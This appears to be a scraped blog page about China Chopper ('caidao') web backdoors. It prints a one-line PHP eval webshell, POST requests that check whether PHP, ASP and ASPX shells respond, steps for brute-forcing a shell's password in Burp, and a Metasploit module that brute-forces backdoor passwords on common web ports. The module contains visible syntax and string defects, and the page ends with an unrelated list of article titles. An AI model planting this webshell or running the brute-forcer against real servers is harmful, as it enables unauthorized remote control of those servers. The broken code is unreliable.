Backdoor Request

PHP Backdoor:     <?php @eval($_POST["OP"]);?>

HTTP Request:

POST /bk.php

....

op=phpinfo();

If it's successful, phpinfo page will show us.

ASP Backdoor:

HTTP Request:

POST /bk.asp

op=execute("response.write(""woo""):response.write(Len(""admin"")):response.write(""woo""):response.    end")

If it's successful, 'woo5woo' page will show us.

ASPX Backdoor:

HTTP Request:

POST /bk.aspx

op=Response.Write("woo");Response.Write(1+4);Response.Write("woo")

If it's successful, 'woo5woo' page will show us.

Crack a php backdoor

For Example, we will crack caidao php backdoor step by step.

1. We create a html login form to learn how to use php backdoor.

Press  the lable called "Click Here", we will see HTTP request in burpsuite.

send it to intruder, and make "adminadmin" as a intruder variable.

Bingo ! The password is 'adminadmin'. Now we can do it with metasploit as follow.

Crack backdoors with metasploit

##

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient

include Msf::Auxiliary::Scanner

include Msf::Auxiliary::AuthBrute

def initialize(info = {})

super(update_info(info,

'Name'           => 'Chinese Caidao Backdoor Bruteforce',

'Description'    => 'This module attempts to brute chinese caidao php/asp/aspx backdoor.',

'Author'         => [ 'Nixawk' ],

'References'     =>

[

[ 'URL', 'http://blog.csdn.net/nixawk/article/details/40430329']

],

'License'        => MSF_LICENSE

))

register_options([

OptEnum.new('TYPE', [ true, "backdoor type", "PHP", ["PHP", "ASP", "ASPX"] ]),

OptBool.new('VERBOSE', [ false, 'Enable detailed status messages', false ])

OptString.new('TARGETURI', [ true, "The URI to authenticate against", "/backdoor.php" ])

], self.class)

register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])

end

def backdoor_brute(uri, user, pass, payload, match)

begin

data = "&user=#{user}{pass}=#{payload}"

res = send_request_cgi({

'uri'          =>  uri,

'method'       =>  "POST",

'data'         =>  "#{data}"

})

rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEOUT

print_error("#{peer} - Service failed to respond")

return :abort

end

print_status("#{peer} - brute force caidao password: \"#{pass}\"")

if res and res.code == 200 and res.body =~ /#{match}/mi

print_good("#{peer} - Successful login: password - \"#{pass}\"")

return :next_user

end

return

end

def run_host(ip)

uri = normalize_uri(target_uri.path)

script_type = datastore['TYPE']

junk = Rex::Text::rand_text_alphanumeric(4)

match = "#{junk}4#{junk}"

case script_type

when /php$/mi

payload = "$_=\"4\";echo \"#{junk}\".$_.\"#{junk}\";";

when /asp$/mi

payload = "execute(\"response.write(\"\"#{junk}\"\"):response.write(Len(\"\"#{junk}\"\")):response.write(\"\"#{junk}\"\"):response.end\")"

when /aspx$/mi

payload = "Response.Write(\"#{junk}\");Response.Write(Len(\"#{junk}\")});Response.Write(\"#{junk}\")"

else

print_error("#{peer} - Backddor type is not support")

return

end

each_user_pass { |user, pass|

backdoor_brute(uri, user, pass, payload, match)

}

end

end

.backdoor.php,Metasploit - crack chinese caidao php backdoor相关推荐

  1. metasploit unleashed(Chinese Simplified Edition)-8

    metasploit基础 Msfconsole Msfconsole Command MSFconsole有许多不同的命令选项可供选择. 根据不同的输出,以下是Metasploit命令的核心集. ba ...

  2. 【论文合集】Awesome Backdoor Learning

    关于后门攻击&防御的博客与论文. ECCV2022对抗攻击&防御论文汇总 | Li's Blog (tuoli9.github.io) ICLR2022对抗攻击&防御论文汇总 ...

  3. 后渗透篇:常见backdoor和persistence方式方法

    常见backdoor和persistence方式方法 系统工具替换后门 Image 劫持辅助工具管理器 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT ...

  4. Metasploit Framework Handbook

    文章目录 前言 MsFramework Metasploit 诞生发展 体系结构 功能阶段 工具管理 基本命令 情报搜集 网络服务渗透测试 Refference 前言 众所周知Metasploit工具 ...

  5. Kali linux 2016.2(Rolling)中的auxiliary模块详解

    不多说,直接上干货! root@kali:~# msfconsole__________________________________________________________________ ...

  6. BlackArch-Tools

    BlackArch-Tools 简介安装在ArchLinux之上添加存储库从blackarch存储库安装工具替代安装方法BlackArch Linux Complete Tools List 简介 B ...

  7. Payload Inject And Fake

    常见捆绑注入payload手法 Payload捆绑注入 注入exe型+编码: msfvenom -a <arch> --plateform <platform> -p < ...

  8. 5期-Metasploitable3专题课程

    metasploitable2基于ubantu的渗透演练环境.Rapid7官方长时间未更新,导致跟不上当前的节奏.metasploitable3出世. metasploitable2配合metaspl ...

  9. kail 常用小程序学习总结1

    一.arping 1.ARP协议是"Address Resolution Protocol"(地址解析协议)的缩写.在同一以太网中,通过地址解析协议,源主机可以通过目的主机的IP地 ...

  10. windows中进程详解

    近来闲得无事,就在网上搜集了部分windows中的一些进程,希望大家能喜欢.这东西太多,也许会让你看得烦躁.冒犯指出敬请原谅,谢谢! 系统进程描述 system process 进程文件: [syst ...

最新文章

  1. 走近TCP/IP协议
  2. 这两天发现一个老外用JavaScript编写的好东西:dp.SyntaxHighlighter。
  3. Spring-Mybatis MapperScannerConfigurer 取不到PropertyPlaceholderConfigurer里的值
  4. c语言数组左下角便*,数据结构 - 数组
  5. 大数据建设意义_大数据一体化平台打造政府智能数据库,助力智慧政务建设
  6. linux系统调用函数---12
  7. (4)vue.js 基础语法
  8. 第八章 linux磁盘与文件系统管理g
  9. 改变计算技术的9个伟大算法
  10. Y460安装桌面导航
  11. 怎样快速学习一门新技术
  12. python123星号直角三角形_Python123:星号三角形、凯撒密码
  13. IOS描述文件mobileprovision问题
  14. Scala中特质的使用以及特质冲突
  15. Go官方包 - strings包
  16. 解决在uniapp项目中小程序调用获取微信绑定手机号
  17. vue的安装与基本使用
  18. 智行者王肖:自动驾驶本质在于对待数据的态度、获取及应用方式 | 自动驾驶这十年...
  19. Linux关于ssh: connect to host xxx.xxx.xxx.xxx port 22: Operation timed out问题
  20. 交换机下配置banner login是做什么的

热门文章

  1. 2022年全球市场风电铸件总体规模、主要生产商、主要地区、产品和应用细分研究报告
  2. 【舆情报告】当我们在谈论王者荣耀时,我们在谈论什么?
  3. 返回链表的中间结点,若中间有两个结点,则返回后一个结点(两种方法)
  4. Author Agreement
  5. PMP项目进度网络图详解——第1篇:甘特图、PERT
  6. 定位点击WebBrowser、点击Flash、偷菜外挂
  7. 非结构化数据分析技术是忽悠
  8. 悦刻电子烟一代二代三代四代区别是什么?
  9. 电脑4g内存C语言CAD够用吗,电脑4g内存够用吗-电脑4g内存是否够用详情介绍 - 系统家园...
  10. windows server 2008r2更新server pack 1补丁包和勒索病毒nsa,永恒之蓝 补丁包